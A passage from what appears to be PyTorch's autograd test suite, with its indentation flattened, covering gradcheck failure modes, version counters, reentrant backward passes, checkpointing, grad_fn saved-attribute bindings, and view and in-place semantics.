# when sparse outputs (always raise even if raise_exception=False)
x = torch.rand(10, requires_grad=True).to_sparse()
with self.assertRaisesRegex(ValueError, 'Sparse output is not supported at gradcheck yet'):
gradcheck(lambda x: x, (x,), check_sparse_nnz=True, check_batched_grad=False, raise_exception=False,
fast_mode=fast_mode)
# when mkldnn outputs (always raise even if raise_exception=False)
root = torch.randn(4, 5, dtype=torch.float32, requires_grad=True)
with self.assertRaisesRegex(ValueError, 'MKLDNN output is not supported at gradcheck yet'):
gradcheck(lambda x: x.to_mkldnn(), (root,), check_batched_grad=False, raise_exception=False, fast_mode=fast_mode)
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_check_no_differentiable_outputs(self):
def check(fast_mode):
# When none of the outputs are differentiable, but numerical gradient is not zero
x = torch.ones((1,), requires_grad=True)
with self.assertRaisesRegex(RuntimeError, 'Numerical gradient for function expected to be zero'):
gradcheck(lambda x: torch.tensor([x]), x)
self.assertFalse(gradcheck(lambda x: torch.tensor([x]), x, raise_exception=False, fast_mode=fast_mode))
# succeed when no outputs at all
self.assertTrue(gradcheck(lambda x: (), (x,), fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_check_batched_grad(self):
def check(fast_mode):
x = torch.rand(10, dtype=torch.double, requires_grad=True).to_sparse()
# runtime error while compute batched grad (print big error)
with self.assertRaisesRegex(RuntimeError, 'gradcheck or gradgradcheck failed while testing batched gradient'):
gradcheck(lambda x: x.to_dense(), (x,), check_sparse_nnz=True, check_batched_grad=True, fast_mode=fast_mode)
self.assertFalse(gradcheck(lambda x: x.to_dense(), (x,), check_sparse_nnz=True, check_batched_grad=True,
raise_exception=False, fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_backward_mul_by_grad_output(self):
# when grad_input is sparse and has incorrect sparse_dim/dense_dim
def check(fast_mode):
def fn(x):
def hook(grad):
if grad is not None:
return grad.to_dense().to_sparse(1)
return grad
y = x.clone()
y.register_hook(hook)
return y.to_dense()
x = torch.ones((2, 2), dtype=torch.double, requires_grad=True).to_sparse()
with self.assertRaisesRegex(RuntimeError, 'grad is sparse tensor, but has incorrect sparse_dim'):
gradcheck(fn, (x,), atol=1e-1, check_sparse_nnz=True, check_batched_grad=False, fast_mode=fast_mode)
self.assertFalse(gradcheck(fn, (x,), atol=1e-1, check_sparse_nnz=True, check_batched_grad=False,
raise_exception=False, fast_mode=fast_mode))
# when backward not multiplied by grad_output (non-sparse case)
def fn2(x):
y = x.clone()
y.register_hook(lambda x: x + 1e-2)
return y
x = torch.ones(1, dtype=torch.double, requires_grad=True)
with self.assertRaisesRegex(RuntimeError, 'backward not multiplied by grad_output'):
gradcheck(fn2, (x,), atol=1e-1, fast_mode=fast_mode)
self.assertFalse(gradcheck(fn2, (x,), atol=1e-1, raise_exception=False, fast_mode=fast_mode))
# when backward not multiplied by grad_output (sparse case)
def fn3(x):
y = x.clone().to_dense()
y.register_hook(lambda x: x + 1e-2)
return y
x = torch.ones(1, dtype=torch.double, requires_grad=True).to_sparse()
with self.assertRaisesRegex(RuntimeError, 'backward not multiplied by grad_output'):
gradcheck(fn3, (x,), atol=1e-1, check_sparse_nnz=True, check_batched_grad=False, fast_mode=fast_mode)
self.assertFalse(gradcheck(fn3, (x,), atol=1e-1, check_sparse_nnz=True, check_batched_grad=False,
raise_exception=False, fast_mode=fast_mode))
# when layout of grad_input is not the same as input
class Test(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, x):
return x.to_sparse()
x = torch.ones(1, dtype=torch.double, requires_grad=True)
with self.assertRaisesRegex(RuntimeError, 'grad is incorrect layout'):
gradcheck(Test.apply, (x,), check_batched_grad=False, fast_mode=fast_mode)
self.assertFalse(gradcheck(Test.apply, (x,), check_batched_grad=False, raise_exception=False, fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_undefined_grad(self):
def check(fast_mode):
# when encounter runtime error while running backward
def fn(x):
def hook(x):
if x is None:
raise RuntimeError("x is undefined")
y = x.clone()
y.register_hook(hook)
return y
x = torch.ones(1, dtype=torch.double, requires_grad=True)
with self.assertWarnsRegex(UserWarning, "Backwards compatibility: New undefined gradient support checking feature"):
with self.assertRaisesRegex(RuntimeError, 'Expected backward function to handle undefined output grads'):
gradcheck(fn, (x,), fast_mode=fast_mode)
self.assertFalse(gradcheck(fn, (x,), raise_exception=False, fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_jacobian_mismatch(self):
def check(fast_mode):
def fn(x): # R -> R, C -> C
y = x.clone()
y.register_hook(lambda x: x + 1e-2)
return y
x = torch.ones(2, 2, requires_grad=True)
with self.assertRaisesRegex(RuntimeError, 'Jacobian mismatch for output 0 with respect to input 0'):
gradcheck(fn, (x,), fast_mode=fast_mode)
self.assertFalse(gradcheck(fn, (x,), raise_exception=False, fast_mode=fast_mode))
x_c = torch.ones(2, 2, requires_grad=True, dtype=torch.complex128)
with self.assertRaisesRegex(RuntimeError, 'While considering the imaginary part of complex outputs only'):
gradcheck(fn, (x_c,), fast_mode=False)
self.assertFalse(gradcheck(fn, (x_c,), raise_exception=False, fast_mode=False))
def fn2(x): # R -> C
y = torch.complex(x, x)
y.register_hook(lambda x: x + 1e-2)
return y
x = torch.ones(2, 2, requires_grad=True)
with self.assertRaisesRegex(RuntimeError, 'While considering the imaginary part of complex outputs only'):
gradcheck(fn2, (x,), fast_mode=False)
self.assertFalse(gradcheck(fn2, (x,), raise_exception=False, fast_mode=False))
def fn3(x): # C -> R
y = torch.real(x)
y.register_hook(lambda x: x + 1e-2)
return y
with self.assertRaisesRegex(RuntimeError, 'Jacobian mismatch for output 0 with respect to input 0'):
gradcheck(fn3, (x_c,), fast_mode=False)
self.assertFalse(gradcheck(fn3, (x_c,), raise_exception=False, fast_mode=False))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_dense_and_sparse_inputs(self):
def check(fast_mode):
def fn(x, y):
return x * y.coalesce().to_dense()
a = torch.rand(2, 2, dtype=torch.double, requires_grad=True)
b = torch.rand(2, 2, dtype=torch.double,).to_sparse().requires_grad_(True)
self.assertTrue(gradcheck(fn, (a, b), check_sparse_nnz=True, check_batched_grad=False, fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
@unittest.skipIf(not torch._C.has_mkldnn, "MKL-DNN build is disabled")
def test_gradcheck_multiple_mkldnn_inputs(self):
def check(fast_mode):
def fn(x, y):
return x + y.to_dense()
a = torch.rand(10, requires_grad=True)
b = torch.rand(10, dtype=torch.float32).to_mkldnn().requires_grad_(True)
self.assertTrue(gradcheck(fn, (a, b), atol=1e-1, check_batched_grad=False, fast_mode=fast_mode))
def fn2(x, y):
return x.to_dense() + y.to_dense()
c = torch.rand(10, dtype=torch.float32).to_mkldnn().requires_grad_(True)
self.assertTrue(gradcheck(fn, (a, c), atol=1e-1, check_batched_grad=False, fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_output_shape_or_dtype_depend_on_values(self):
def check(fast_mode):
def fn(x):
if torch.all(x >= 1):
return torch.cat([x, x])
else:
return x
a = torch.ones(1, dtype=torch.double, requires_grad=True)
with self.assertRaisesRegex(AssertionError, 'return outputs with the same shape when inputs are perturbed'):
self.assertTrue(gradcheck(fn, (a,), fast_mode=fast_mode))
def fn2(x):
if torch.all(x >= 1):
return x.to(torch.float32)
else:
return x
with self.assertRaisesRegex(AssertionError, 'return outputs with the same dtype when inputs are perturbed'):
self.assertTrue(gradcheck(fn2, (a,), fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_complex_non_complex_outputs(self):
def fn(x, y):
z = torch.complex(x, y)
return z, x + 1
a = torch.ones(2, 2, requires_grad=True, dtype=torch.float64)
b = torch.ones(2, 2, requires_grad=True, dtype=torch.float64)
self.assertTrue(gradcheck(fn, (a, b)))
def fn2(z):
return z, torch.real(z)
c = torch.ones(2, 2, requires_grad=True, dtype=torch.complex128)
self.assertTrue(gradcheck(fn2, (c)))
def test_gradcheck_get_numerical_jacobian(self):
# get_numerical_jacobian is deprecated and no longer used internally by gradcheck
from torch.autograd.gradcheck import get_numerical_jacobian
def fn(inputs):
# get_numerical_jacobian requires fn to take inputs as a tuple
# and returns the jacobian wrt the first output
x = inputs[0]
y = inputs[1]
return 2 * x + y, x + 2 * y
a = torch.rand(2, 2, requires_grad=True, dtype=torch.float64)
b = torch.rand(2, 2, requires_grad=True, dtype=torch.float64)
with self.assertWarnsRegex(UserWarning, "get_numerical_jacobian was part of PyTorch's private API"):
jacobian = get_numerical_jacobian(fn, (a, b), target=a, eps=1e-6)
self.assertEqual(jacobian[0], 2 * torch.eye(4, dtype=torch.double))
with self.assertWarnsRegex(UserWarning, "get_numerical_jacobian was part of PyTorch's private API"):
jacobian = get_numerical_jacobian(fn, (a, b), eps=1e-6)
self.assertEqual(jacobian[0], 2 * torch.eye(4, dtype=torch.double))
self.assertEqual(jacobian[1], 1 * torch.eye(4, dtype=torch.double))
with self.assertRaisesRegex(ValueError, "Expected grad_out to be 1.0"):
jacobian = get_numerical_jacobian(fn, (a, b), eps=1e-6, grad_out=2.0)
def test_gradcheck_get_analytical_jacobian(self):
from torch.autograd.gradcheck import get_analytical_jacobian
def fn(x, y):
return 2 * x + y, x + 2 * y
a = torch.rand(2, 2, requires_grad=True, dtype=torch.float64)
b = torch.rand(2, 2, requires_grad=True, dtype=torch.float64)
outputs = fn(a, b)
with self.assertWarnsRegex(UserWarning, "get_analytical_jacobian was part of PyTorch's private API"):
jacobians, reentrant, correct_grad_sizes, correct_grad_types = get_analytical_jacobian((a, b), outputs[0])
self.assertEqual(jacobians[0], 2 * torch.eye(4, dtype=torch.double))
self.assertEqual(jacobians[1], 1 * torch.eye(4, dtype=torch.double))
self.assertTrue(reentrant)
class NonDetFunc(Function):
@staticmethod
def forward(ctx, x, jitter=0.0):
ctx._jitter = jitter
return x
@staticmethod
def backward(ctx, grad_out):
return NonDetFunc.apply(grad_out, ctx._jitter) * (1 + torch.rand_like(grad_out) * ctx._jitter), None
outputs = NonDetFunc.apply(a, 1e-6)
with self.assertWarnsRegex(UserWarning, "get_analytical_jacobian was part of PyTorch's private API"):
jacobians, reentrant, correct_grad_sizes, correct_grad_types = get_analytical_jacobian((a,), outputs)
self.assertFalse(reentrant)
with self.assertRaisesRegex(ValueError, "Expected grad_out to be 1.0"):
jacobians, _, _, _ = get_analytical_jacobian((a,), outputs, grad_out=2.0)
def test_gradcheck_custom_error(self):
from torch.autograd.gradcheck import GradcheckError
def check(fast_mode):
def fn(x):
y = x.clone()
y.register_hook(lambda x: x + 1e-2)
return y
x = torch.ones(2, 2, requires_grad=True)
with self.assertRaisesRegex(GradcheckError, 'Jacobian mismatch for output 0 with respect to input 0'):
gradcheck(fn, (x,), fast_mode=fast_mode)
with self.assertRaisesRegex(RuntimeError, 'Jacobian mismatch for output 0 with respect to input 0'):
gradcheck(fn, (x,), fast_mode=fast_mode)
self.assertFalse(gradcheck(fn, (x,), raise_exception=False, fast_mode=fast_mode))
def fn2(x):
raise RuntimeError("Not a GradcheckError!")
# Checks that when raise_exception=False, non-GradcheckErrors are not caught by gradcheck
with self.assertRaisesRegex(RuntimeError, "Not a GradcheckError!"):
gradcheck(fn2, (x,), fast_mode=fast_mode, raise_exception=False)
check(fast_mode=True)
check(fast_mode=False)
def test_version_counter(self):
x = torch.randn(1, 2)
# In-place op bumps version
x_saved_version = x._version
x.add_(1).add_(1)
self.assertTrue(x._version > x_saved_version)
# Differentiable view shares version counter
xz = x[:]
self.assertTrue(x._version == xz._version)
xz.add_(1)
self.assertTrue(x._version == xz._version)
# `x.data = y` preserves version counter of `x`
x_saved_version = x._version
x.data = torch.randn(2, 3)
self.assertTrue(x._version == x_saved_version)
x.add_(1)
self.assertTrue(x._version > x_saved_version)
# Make sure `x` is still using the same version counter it shares with `xz`
self.assertTrue(x._version == xz._version)
# In-place op on `xz` also updates version of `x`,
# because they share the version counter
xz.add_(1)
self.assertTrue(x._version == xz._version)
def test_set_data_tensorimpl_type(self):
# Dense tensor has impl of type `TensorImpl`, while sparse tensor has impl
# of type `SparseTensorImpl`.
x = torch.randn(1, 2)
x_s = torch.sparse_coo_tensor(torch.zeros([1, 1]), torch.ones([1]))
with self.assertRaisesRegex(RuntimeError, 'incompatible tensor type'):
x.data = x_s
def test_set_data_preserve_pyobj(self):
a = torch.randn(1, 2)
b = torch.randn(1, 2)
b_id_saved = id(b)
b.data = a
self.assertTrue(b_id_saved == id(b))
@unittest.skipIf(IS_WINDOWS, "Skipping because doesn't work for windows")
def test_thread_shutdown(self):
code = """import torch
from torch.autograd import Function
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, grad):
return grad
for shape in [(1,), ()]:
v = torch.ones(shape, requires_grad=True)
MyFunction.apply(v).backward()
"""
s = TestCase.runWithPytorchAPIUsageStderr(code)
self.assertRegex(s, "PYTORCH_API_USAGE torch.autograd.thread_shutdown")
@unittest.skipIf(IS_MACOS, "Fails with SIGBUS on macOS; https://github.com/pytorch/pytorch/issues/25941")
def test_deep_reentrant(self):
class DeepReentrant(Function):
@staticmethod
def forward(ctx, x):
with torch.enable_grad():
ctx.x = Variable(x.detach(), requires_grad=True)
ctx.x = ctx.x - 1
return ctx.x.detach()
@staticmethod
def backward(ctx, x):
if ctx.x < 0:
return x
with torch.enable_grad():
DeepReentrant.apply(ctx.x).sum().backward()
return x
# Test stack overflow escape mechanism
v = torch.tensor(2000.0, requires_grad=True)
# This will cause stack overflow if reentrant calls are handled
# in the same thread recursively
DeepReentrant.apply(v).sum().backward()
# Test stack overflow escape mechanism multiple times
# to ensure reusing workers in the pool works fine
v2 = torch.tensor(200.0, requires_grad=True)
DeepReentrant.apply(v2).sum().backward()
def test_reentrant_priority(self):
order = []
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, x):
order.append("MyFunction")
return x
class Reentrant(Function):
@staticmethod
def forward(ctx, x):
with torch.enable_grad():
ctx.x = Variable(x.detach(), requires_grad=True)
ctx.x = ctx.x - 1
return ctx.x.detach()
@staticmethod
def backward(ctx, x):
order.append("Reentrant")
if ctx.x < 0:
return x
with torch.enable_grad():
Reentrant.apply(ctx.x).backward()
return x
a = MyFunction.apply(torch.tensor(6.0, requires_grad=True))
b = Reentrant.apply(torch.tensor(9.0, requires_grad=True))
v = a * b
v.backward()
# The tasks for the Reentrant and MyFunction backward() will be added
# to the queue in the autograd engine at the same time. The backward
# for Reentrant will be executed first, which will then add other
# backward tasks to the queue. We want to ensure all the reentrant tasks
# are prioritized over the MyFunction backward task regardless of their
# sequence numbers
self.assertEqual(len(order), 11)
self.assertEqual(order.count("Reentrant"), 10)
self.assertEqual(order[-1], "MyFunction")
@slowTest
def test_checkpointing(self):
num_inp = 2000
nz_inp = 10
nz_out = 10
nz_bottleneck = 1000
# small proxy network for some complex reasoning we want to do per input
module = nn.Sequential(
nn.Linear(nz_inp, nz_bottleneck),
nn.ReLU(),
nn.Linear(nz_bottleneck, nz_inp)
)
feat_combined = []
for r in range(num_inp):
data_r = torch.empty(1, nz_inp)
data_r.uniform_()
data_r.requires_grad = True
feat_r = checkpoint(module, data_r)
feat_combined.append(feat_r)
# compute mean as a proxy for some joint reasoning
mean_combined = torch.stack(feat_combined).mean()
mean_combined.backward()
def test_checkpoint_valid_reset_on_error(self):
a = torch.randn(2, 2, requires_grad=True)
with self.assertRaisesRegex(Exception, "Checkpointing is not compatible with .grad()"):
b = checkpoint(torch.exp, a).sum()
torch.autograd.grad(b, (a,))
c = checkpoint(torch.exp, a).sum()
c.backward()
def _test_reentrant_with_callbacks(self, install_callbacks_in_depths):
counter = {}
counter["inner"] = 0
counter["outer"] = 0
def inc_inner_counter():
counter["inner"] += 1
def inc_outer_counter():
counter["outer"] += 1
class MyFunc(Function):
@staticmethod
def forward(ctx, input):
return input
@staticmethod
@once_differentiable
def backward(ctx, input):
if 1 in install_callbacks_in_depths:
# Add a callback to execute.
Variable._execution_engine.queue_callback(inc_inner_counter)
return input
class MyReentrantFunc(Function):
@staticmethod
def forward(ctx, input):
return input
@staticmethod
@once_differentiable
def backward(ctx, input):
if 0 in install_callbacks_in_depths:
# Add a callback to execute.
Variable._execution_engine.queue_callback(inc_outer_counter)
# Reentrant backward call.
tmp_inp = input.detach().requires_grad_()
with torch.enable_grad():
tmp_out = (MyFunc.apply(tmp_inp)).sum()
tmp_out.backward()
return input
t1 = torch.rand((3, 3), requires_grad=True)
t2 = MyReentrantFunc.apply(t1)
t3 = t2.sum()
torch.autograd.backward([t3])
return counter
def test_reentrant_with_callbacks_depth_0(self):
# Verify callback is called only once.
ret = self._test_reentrant_with_callbacks([0])
self.assertEqual(1, ret["outer"])
self.assertEqual(0, ret["inner"])
def test_reentrant_with_callbacks_depth_1(self):
# Verify callback is called only once.
ret = self._test_reentrant_with_callbacks([1])
self.assertEqual(0, ret["outer"])
self.assertEqual(1, ret["inner"])
def test_reentrant_with_callbacks_both_depths(self):
# Verify callback is called twice.
ret = self._test_reentrant_with_callbacks([0, 1])
self.assertEqual(1, ret["outer"])
self.assertEqual(1, ret["inner"])
def test_reentrant_with_leaf_variable_hook(self):
handle = None
param = torch.rand(10, requires_grad=True)
def add_gradient_penalty_to_grad(grad):
handle.remove()
old_param_grad = grad
param.grad = None
# Add some sort of gradient penalty by directly updating the gradients
with torch.enable_grad():
g = grad.detach().requires_grad_()
new_param = param.detach().requires_grad_()
out = ((g * 2) + new_param).sum()
out.backward()
res = g.grad + grad
param.grad = old_param_grad
return res
handle = param.register_hook(add_gradient_penalty_to_grad)
# Forward pass
tmp = (param * param)
loss = tmp.sum()
# Compute the gradients
loss.backward()
def test_reentrant_with_non_leaf_variable_hook(self):
handle = None
param = torch.rand(10, requires_grad=True)
def manual_increase_gradient(grad):
handle.remove()
# Add some sort of gradient penalty by directly updating the gradients
with torch.enable_grad():
g = grad.detach().requires_grad_()
out = ((g * 2) + 5).sum()
out.backward()
res = g.grad + grad
return res
# Forward pass
tmp = (param * param)
handle = tmp.register_hook(manual_increase_gradient)
loss = tmp.sum()
# Compute the gradients
loss.backward()
self.assertEqual(param.grad, 6 * param)
def test_grad_fn_attr_bindings(self):
# Check that the getter of each type returns what we want
# See `gen_autograd_functions.py` for how the getters are generated
#
# This test is only meant to check if the codegen'd bindings work
# Please help update this test if you update the names of any the fields we check!
#
a = torch.ones(1, requires_grad=True)
b = torch.ones(1, requires_grad=True)
out = torch.stack([a, b], dim=0)
self.assertEqual(out.grad_fn._saved_tensors, (a, b)) # TensorList -> Tuple[Tensor]
self.assertIsInstance(out.grad_fn._saved_tensors[0], torch.Tensor)
self.assertEqual(out.grad_fn._saved_dim, 0) # int64_t -> int
self.assertIsInstance(out.grad_fn._saved_dim, int)
out.sum().backward()
with self.assertRaisesRegex(RuntimeError, "after they have already been freed"):
out.grad_fn._saved_tensors
self.assertEqual(out.grad_fn._saved_dim, 0)
a = torch.ones(2, 2, requires_grad=True)
indices = torch.tensor([0, 1])
out = a[:, indices]
self.assertEqual(out.grad_fn._saved_indices, (None, indices)) # c10::List<c10::optional<Tensor>> -> Tuple[Tensor?]
self.assertIsInstance(out.grad_fn._saved_indices[1], torch.Tensor)
self.assertEqual(out.grad_fn._saved_self_sizes, a.shape) # IntArrayRef -> Tuple[int]
self.assertIsInstance(out.grad_fn._saved_self_sizes[0], int)
a = torch.ones(1, 1, 2, requires_grad=True)
out = torch.nn.functional.interpolate(a, 4, mode="linear")
self.assertEqual(out.grad_fn._saved_output_size, (4,)) # c10::optional<IntArrayRef> -> int[]?
self.assertIsInstance(out.grad_fn._saved_output_size[0], int)
self.assertEqual(out.grad_fn._saved_align_corners, False) # bool -> bool
self.assertIsInstance(out.grad_fn._saved_align_corners, bool)
self.assertIsNone(out.grad_fn._saved_scale_factors) # c10::optional<ArrayRef<double>> -> float[]?
out = torch.nn.functional.interpolate(a, scale_factor=0.5, mode="linear")
self.assertIsNone(out.grad_fn._saved_output_size)
self.assertEqual(out.grad_fn._saved_scale_factors, (0.5,))
self.assertIsInstance(out.grad_fn._saved_scale_factors[0], float)
a = torch.ones(2, 2, requires_grad=True)
out = torch.pdist(a, p=1)
self.assertEqual(out.grad_fn._saved_p, 1.) # double -> float
self.assertIsInstance(out.grad_fn._saved_p, float)
a = torch.ones(1, 1, 2, requires_grad=True)
out = torch.logit(a, 1.)
self.assertEqual(out.grad_fn._saved_eps, 1.) # c10:optional<double> -> float?
self.assertIsInstance(out.grad_fn._saved_eps, float)
out = torch.logit(a)
self.assertIsNone(out.grad_fn._saved_eps)
if torch._C.has_lapack:
a = torch.ones(1, 1, requires_grad=True)
q, r = torch.linalg.qr(a, mode="reduced")
self.assertEqual(q.grad_fn._saved_mode, "reduced") # std::string -> str
a = torch.tensor([1.], requires_grad=True)
out = torch.div(a, 2., rounding_mode="trunc")
self.assertEqual(out.grad_fn._saved_rounding_mode, "trunc") # c10::optional<std::string> -> str?
out = torch.div(a, 2., rounding_mode=None)
self.assertIsNone(out.grad_fn._saved_rounding_mode) # c10::optional<std::string> -> str?
x = torch.zeros(5, requires_grad=True)
out = torch.threshold(x, threshold=(1 + 0j), value=(1 + 0j))
self.assertIsInstance(out.grad_fn._saved_threshold, complex) # Scalar(complex double) -> complex
cfloat = torch.tensor(1 + 0j, dtype=torch.complex64)
out = torch.threshold(x, threshold=cfloat, value=(1 + 0j))
self.assertIsInstance(out.grad_fn._saved_threshold, complex) # Scalar(complex float) -> complex
out = torch.threshold(x, threshold=1., value=1.)
self.assertIsInstance(out.grad_fn._saved_threshold, float) # Scalar(floating point) -> float
out = torch.threshold(x, threshold=1, value=1)
self.assertIsInstance(out.grad_fn._saved_threshold, int) # Scalar(integral) -> int
out = torch.threshold(x, threshold=False, value=False)
self.assertIsInstance(out.grad_fn._saved_threshold, bool) # Scalar(bool) -> bool
a = torch.ones(2, 2, requires_grad=True)
out = a.as_strided((3,), (1,), 1)
self.assertEqual(out.grad_fn._saved_storage_offset, 1) # c10:optional<int64_t> -> int?
self.assertIsInstance(out.grad_fn._saved_storage_offset, int)
out = a.as_strided((3,), (1,))
self.assertIsNone(out.grad_fn._saved_storage_offset)
a = torch.ones(2, requires_grad=True)
out = torch.tanh(a)
self.assertEqual(out, out.grad_fn._saved_result) # saved variable when output
a = torch.randn(3, 5, requires_grad=True)
b = torch.tensor([1, 0, 4])
loss = nn.NLLLoss()
out = loss(a, b)
self.assertIsNone(out.grad_fn._saved_weight)
loss = nn.NLLLoss(weight=torch.ones((5,)))
out = loss(a, b)
self.assertEqual(out.grad_fn._saved_weight, torch.ones((5,))) # c10:optional<Tensor> -> Tensor?
out.sum().backward()
with self.assertRaisesRegex(RuntimeError, "after they have already been freed"):
out.grad_fn._saved_weight
def test_autograd_views_codegen(self):
# This is not necessarily the absolute correct behavior, but this is the current
# one. This test is here to make sure that any change to this behavior is detected
# and not silent. The TODOs below mark the places with unexpected behavior.
# Note that any change in these test will be BC-breaking and should be done carefully.
# This test checks the behavior of two codegen functions (view_as and unbind)
# with respect to view tracking and inplace operation on the output.
def run_test(grad_mode, requires_grad, is_view, should_raise_tuple):
def maybe_check_raise(fn, should_raise):
self.assertTrue(should_raise is None or isinstance(should_raise, str))
if should_raise is not None:
with self.assertRaisesRegex(RuntimeError, should_raise):
fn()
else:
fn()
inp = torch.rand(2, requires_grad=requires_grad).clone()
with torch.set_grad_enabled(grad_mode):
out = inp.view_as(inp)
# Are they differentiable views?
self.assertTrue(out._is_view() == is_view)
# Are inplace allowed?
maybe_check_raise(lambda: out.add_(1), should_raise_tuple[0])
inp = torch.rand(2, requires_grad=requires_grad).clone()
with torch.set_grad_enabled(grad_mode):
out = inp.unbind()
# Are they differentiable views?
self.assertTrue(out[0]._is_view() == is_view)
self.assertTrue(out[1]._is_view() == is_view)
# Are inplace allowed?
maybe_check_raise(lambda: out[0].add_(1), should_raise_tuple[1])
maybe_check_raise(lambda: out[1].add_(1), should_raise_tuple[2])
# should_raise contains None if it should not raise
# should_raise contains a string of the error if it should raise
# The 3 elements are for view_as, first output of unbind and second output of unbind
run_test(grad_mode=True, requires_grad=False, is_view=True,
should_raise_tuple=(None, None, None))
inp_change_err = "Output {} of UnbindBackward is a view and is being modified inplace."
run_test(grad_mode=True, requires_grad=True, is_view=True,
should_raise_tuple=(None, inp_change_err.format("0"), inp_change_err.format("1")))
leaf_grad_err = "A view was created in no_grad mode and is being modified inplace"
run_test(grad_mode=False, requires_grad=True, is_view=True,
should_raise_tuple=(leaf_grad_err, leaf_grad_err, leaf_grad_err))
run_test(grad_mode=False, requires_grad=False, is_view=True,
should_raise_tuple=(None, None, None))
def test_inplace_not_requires_grad(self):
class MyFn(torch.autograd.Function):
@staticmethod
def forward(ctx, inp):
return inp.view_as(inp)
@staticmethod
def backward(ctx, grad):
return grad
# Original Tensor does not require grad
a = torch.rand(1, 2)
# Tensor being written does require grad
b = torch.rand(1, requires_grad=True)
# Take an invalid view on 'a' that should raise an error (warns during deprecation)
view_a = MyFn.apply(a)
with self.assertRaisesRegex(RuntimeError, "This view was created inside a custom Function"):
view_a += b
# Extra test for copy_ that is a manual implementation and could be easily
# forgotten when the codegen is updated (warns during deprecation)
a = torch.rand(1, 2)
b = torch.rand(1, requires_grad=True)
view_a = MyFn.apply(a)
with self.assertRaisesRegex(RuntimeError, "This view was created inside a custom Function"):
view_a.copy_(b)
# Functions that should throw must properly throw
a = torch.rand(1, 2)
b = torch.rand(1, requires_grad=True)
view_a = a.unbind()[0]
with self.assertRaisesRegex(RuntimeError, "This view is the output of a function that returns "
"multiple views."):
view_a.copy_(b)
# Sanity check that views that should work still work
a = torch.rand(1, 2)
b = torch.rand(1, requires_grad=True)
a.select(1, 0).copy_(b)
def _do_test_autograd_simple_views_python(self, dtype):
# This is not necessarily the absolute correct behavior, but this is the current
# one. This test is here to make sure that any change to this behavior is detected
# and not silent. The TODOs below mark the places with unexpected behavior.
# Note that any change in these test will be BC-breaking and should be done carefully.
# This checks the autograd.Function behavior when we return one or multiple outputs
# while one of these is an input, a view of an input or of a temporary tensor.
# This indicator is used to track how many times the backward function was called
bw_called = [0]
# This indicator is used to check if the argument `ga` contains non-zero values
ga_nz = [False]
class IdOneOutput(Function):
@staticmethod
def forward(ctx, a, b, make_view):
if make_view:
a = a.narrow(0, 0, 2)
else:
a = a.clone()
return a
@staticmethod
def backward(ctx, ga):
bw_called[0] += 1
return ga, None, None
class IdTwoOutput(Function):
@staticmethod
def forward(ctx, a, b, make_view):
if make_view:
a = a.narrow(0, 0, 2)
else:
a = a.clone()
return a, a + b
@staticmethod
def backward(ctx, ga, gab):
bw_called[0] += 1
if ga.eq(0).all():
ga_nz[0] = False
else:
ga_nz[0] = True
return ga + gab, gab, None
class ViewOfTemp(Function):
@staticmethod
def forward(ctx, a, make_view):
ctx.save_for_backward(a)
if make_view:
a = a.narrow(0, 0, 2)
else:
a = a.clone()
b = a.clone()
return b.select(0, 0)
@staticmethod
def backward(ctx, grad):
bw_called[0] += 1
a, = ctx.saved_tensors
res = torch.zeros_like(a)
res.select(0, 0).copy_(grad)
return res, None
fn_id_to_inplace_view_err_msg = {
"one_output": ("Output 0 of IdOneOutputBackward is a view and is being "
"modified inplace. This view was created inside a custom Function"),
"two_output": ("Output 0 of IdTwoOutputBackward is a view and is being modified inplace."
" This view is the output of a function that returns multiple views."),
"view_of_temp": ("Output 0 of ViewOfTempBackward is a view and is being "
"modified inplace. This view was created inside a custom Function")
}
for fn_id in ["one_output", "two_output", "view_of_temp"]:
for inplace in [True, False]:
for make_view in [True, False]:
# Used for special casing the tests below
output_is_a_view = (make_view or fn_id == "view_of_temp")
def fn(a, b):
# never modify a, b inplace for gracheck
a = a.clone()
b = b.clone()
if fn_id == "two_output":
tmp1, tmp2 = IdTwoOutput.apply(a, b, make_view)
if inplace:
tmp1 += 3
tmp2 += 3
else:
tmp1 = tmp1 + 3
tmp2 = tmp2 + 3
tmp = tmp1 * tmp2
else:
if fn_id == "one_output":
tmp = IdOneOutput.apply(a, b, make_view)
else:
tmp = ViewOfTemp.apply(a + b, make_view)
if inplace:
tmp += 3
else:
tmp = tmp + 3
return tmp.sum()
a = torch.ones(2, dtype=dtype, requires_grad=True)
b = torch.ones(2, dtype=dtype, requires_grad=True)
err_msg = fn_id_to_inplace_view_err_msg[fn_id]
if not inplace or not output_is_a_view:
gradcheck(fn, (a, b), check_batched_grad=False)
# Was the custom backward called properly
bw_called[0] = 0
ga_nz[0] = True # For the case where the backward is called
if inplace and output_is_a_view:
with self.assertRaisesRegex(RuntimeError, err_msg):
fn(a, b)
else:
fn(a, b).backward()
expected_called = 1
expected_ga_nz = True
if output_is_a_view and inplace:
expected_called = 0
self.assertTrue(bw_called[0] == expected_called)
self.assertTrue(ga_nz[0] == expected_ga_nz)
def test_autograd_simple_views_python(self):
self._do_test_autograd_simple_views_python(torch.double)
self._do_test_autograd_simple_views_python(torch.cdouble)
def test_autograd_complex_views_python(self):
# This is not necessarily the absolute correct behavior, but this is the current
# one. This test is here to make sure that any change to this behavior is detected
# and not silent. The TODOs below mark the places with unexpected behavior.
# Note that any change in these test will be BC-breaking and should be done carefully.
# This checks that multiples views in the forward are properly traced and how they
# behave with respect to inplace operations.
# This indicator is used to track how many times the backward function was called
bw_called = [0]
class ComplexView(Function):
@staticmethod
def forward(ctx, a, idx):
res = a.narrow(0, idx, 1)
res = a.select(0, idx)
ctx.save_for_backward(a)
ctx.idx = idx
return res
@staticmethod
def backward(ctx, grad):
bw_called[0] += 1
a, = ctx.saved_tensors
res = torch.zeros_like(a)
